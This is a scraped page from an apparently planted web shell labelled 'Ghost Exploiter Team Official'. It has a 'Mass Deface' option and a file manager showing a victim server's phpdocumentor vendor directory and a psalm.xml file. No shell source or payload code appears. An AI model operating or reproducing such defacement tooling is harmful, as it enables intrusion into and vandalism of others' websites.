Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.github
--
ren
.phive
--
ren
.phpdoc
--
ren
docs
--
ren
src
--
ren
tests
--
ren
.gitattributes
0.017KB
edt
ren
.gitignore
0.46KB
edt
ren
.yamllint.yaml
1.264KB
edt
ren
LICENSE
1.055KB
edt
ren
Makefile
2.243KB
edt
ren
README.md
4.309KB
edt
ren
composer-require-checke
...
0.339KB
edt
ren
composer.json
2.104KB
edt
ren
composer.lock
111.739KB
edt
ren
example.php
1.79KB
edt
ren
phpbench.json
0.138KB
edt
ren
phpcs.xml.dist
2.534KB
edt
ren
phpdoc.dist.xml
1.455KB
edt
ren
phpstan.neon
1.274KB
edt
ren
phpunit.xml.dist
1.032KB
edt
ren
psalm-baseline.xml
8.365KB
edt
ren
psalm.xml
0.925KB
edt
ren
rector.php
0.662KB
edt
ren
<?xml version="1.0"?> <psalm errorLevel="1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="https://getpsalm.org/schema/config" xsi:schemaLocation="https://getpsalm.org/schema/config file:///composer/vendor/vimeo/psalm/config.xsd" errorBaseline="psalm-baseline.xml" > <projectFiles> <directory name="src" /> <ignoreFiles> <!-- ExpressionPrinter inherits all kinds of errors from PHP-Parser that I cannot fix, until a solution is found we ignore this --> <file name="src/phpDocumentor/Reflection/Php/Expression/ExpressionPrinter.php"/> <directory name="vendor" /> </ignoreFiles> </projectFiles> <issueHandlers> <LessSpecificReturnType errorLevel="info" /> <MoreSpecificImplementedParamType errorLevel="info" /> <DeprecatedConstant errorLevel="info" /> </issueHandlers> </psalm>
<=Back
Liking